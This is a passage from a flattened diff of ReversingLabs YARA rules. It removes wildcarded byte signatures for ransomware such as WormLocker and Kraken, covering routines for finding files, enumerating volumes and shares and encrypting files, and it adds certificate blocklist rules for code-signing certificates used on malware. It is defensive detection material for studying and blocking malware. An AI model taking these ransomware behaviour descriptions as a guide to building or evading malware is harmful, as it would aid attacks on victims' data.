15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ?? - ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 - } - $encrypt_files_p2 = { - 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05 - ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A - ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53 - 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33 - C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? - 50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D - 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57 - FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 - FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E - 5B 8B E5 5D C3 - } - $find_files = { - 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF - D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? - 0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 - C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? - 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? - ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56 - 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $enum_resources = { - 55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ?? - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? - 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33 - DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF - 36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50 - FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($enum_resources) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE { meta: - description = "Yara rule that detects WormLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae" - date = "2021-08-12" - modified = "2021-08-12" + id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13404-L13420" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WormLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $set_environment = { - 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? - ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - 11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A - } - $find_files = { - 00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? - ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? - ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ?? - ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11 - ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 - 13 ?? 11 ?? 2D ?? 2A - } - $encrypt_files_p1 = { - 00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 - ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? - ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? - 00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 - 02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? - ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 - 2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A - } - $encrypt_files_p2 = { - 00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? - ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A - } - condition: - uint16(0)==0x5A4D and ($set_environment) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="73:e2:f3:4c:9c:24:35:f2:9b:be:0a:3c" and 1480312984<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_68C457D7495D2A8D0D7B9042836135C2 : INFO FILE { meta: - description = "Yara rule that detects Kraken ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7c302c2e-6ffc-5f51-90f4-c4ebd6c1c28b" - date = "2020-07-15" - modified = "2020-07-15" + id = "a8ed2e72-d94e-5141-8ceb-181459a729ad" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Kraken.yara#L1-L151" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4a3867aba4dbdce5d008331a3058f57b00db246975fc4d77b79ab49d5f0bbb15" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13422-L13438" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3eb63f75f258eec611fa4288302f0ce5e47149ca876265a4a4b65dc33313aaa6" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Kraken" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_volumes = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 04 ?? 00 A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 50 45 4C 00 C7 45 - FC 00 00 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? - 8A 06 84 C0 0F 84 ?? ?? ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8B D4 - C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 83 7A ?? ?? 72 ?? 8B 02 EB ?? 8B C2 C6 00 - ?? 80 3E ?? 75 ?? 33 C9 EB ?? 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 51 56 8B CA - E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 C6 ?? E9 ?? ?? ?? ?? BA ?? - ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? - ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? 68 ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 - ?? ?? ?? ?? 8B E5 5D C3 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 - } - $enum_shares_p1 = { - 50 56 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F - 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 66 0F 1F 44 00 ?? FF 75 ?? 6A ?? FF - 15 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 56 8D 45 ?? 89 75 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? 33 FF 0F 1F 40 ?? 3B 7D ?? 0F 83 ?? ?? ?? ?? 8B C7 C1 E0 ?? - 03 F0 F7 46 ?? ?? ?? ?? ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 0F 10 06 83 C4 ?? 8B C8 0F 11 - 00 0F 10 46 ?? 0F 11 40 ?? E8 ?? ?? ?? ?? 8B 75 ?? B3 ?? 47 EB ?? F7 46 ?? ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? 8B 56 ?? 85 D2 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C6 45 ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D 71 ?? 8A 01 41 84 C0 75 - ?? 2B CE 51 52 8D 4D ?? E8 ?? ?? ?? ?? 51 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B - C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B - } - $enum_shares_p2 = { - 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 - ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 55 ?? 8B CC 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 8D 55 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 BA ?? ?? ?? ?? - C6 45 ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? C6 45 ?? ?? 83 C4 ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 - C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? - E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 - ?? ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 ?? - 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? - E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B - C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? - 8B 75 ?? B3 ?? 47 E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? BA - ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 E9 ?? ?? - ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? - ?? ?? ?? C3 - } - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? - ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D 4D ?? - C6 45 ?? ?? 8B 75 ?? 83 FE ?? 8B 7D ?? 8B 55 ?? 0F 43 CF 6A ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 CF 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? 6A ?? 0F 43 - CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FE ?? - 6A ?? 0F 43 CF 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 - C0 C7 45 ?? ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 83 FE ?? C6 45 ?? ?? 8D 4D ?? 0F 43 CF E8 ?? ?? ?? ?? 8B F0 89 75 - ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B D6 50 8B CE E8 ?? ?? ?? ?? 8B 5D ?? 83 C4 ?? - 85 DB 0F 84 ?? ?? ?? ?? 8D 7B ?? B9 ?? ?? ?? ?? 8B C7 66 0F 1F 44 00 ?? 8A 10 3A 11 - 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 F6 EB ?? - 1B F6 83 CE ?? B9 ?? ?? ?? ?? 8B C7 0F 1F 40 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 - ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 3B F0 8B - 75 ?? 0F 85 ?? ?? ?? ?? 8B 43 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 57 3D ?? ?? ?? ?? - 75 ?? E8 ?? ?? ?? ?? 50 8D 55 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC - ?? C6 45 ?? ?? 8B CC 8B D0 51 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 EC ?? C6 45 ?? ?? 8B CC 8D 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 83 C4 - ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? - 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? - ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? B8 ?? ?? ?? ?? C3 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD - E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? - ?? EC 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 C6 45 ?? - ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? 83 EC ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 - 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 ?? 8D 45 ?? 6A ?? - 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 - ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 6A ?? C6 00 - ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D - 4D ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 7D ?? 0F 43 05 ?? ?? ?? ?? 83 FF ?? FF - 35 ?? ?? ?? ?? 8B 75 ?? 0F 43 CE 8B 55 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? - ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 8D 4D ?? 6A ?? 0F 43 CE 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 - } - $encrypt_files_p2 = { - 84 C0 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? - ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 - ?? 6A ?? 0F 43 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B - D8 83 FB ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 68 ?? - ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 1B D7 01 05 - ?? ?? ?? ?? 11 15 ?? ?? ?? ?? 83 65 ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 8B FA - 8B F0 8B 55 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 6A ?? 1B D7 01 05 ?? ?? ?? ?? - 8B 45 ?? 11 15 ?? ?? ?? ?? 01 05 ?? ?? ?? ?? 6A ?? 83 15 ?? ?? ?? ?? ?? 6A ?? 53 FF - 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 6A ?? 8B F0 8B FA 8D 45 ?? 50 FF 75 ?? FF 35 ?? ?? - ?? ?? 53 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 2B C6 53 1B D7 01 05 ?? ?? ?? ?? 11 15 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 51 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 83 - 79 ?? ?? 72 ?? 8B 09 83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 83 05 ?? ?? ?? ?? ?? 83 15 ?? ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? - 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="68:c4:57:d7:49:5d:2a:8d:0d:7b:90:42:83:61:35:c2" and 1476921600<=pe.signatures[i].not_after) +} +import "pe" + +rule 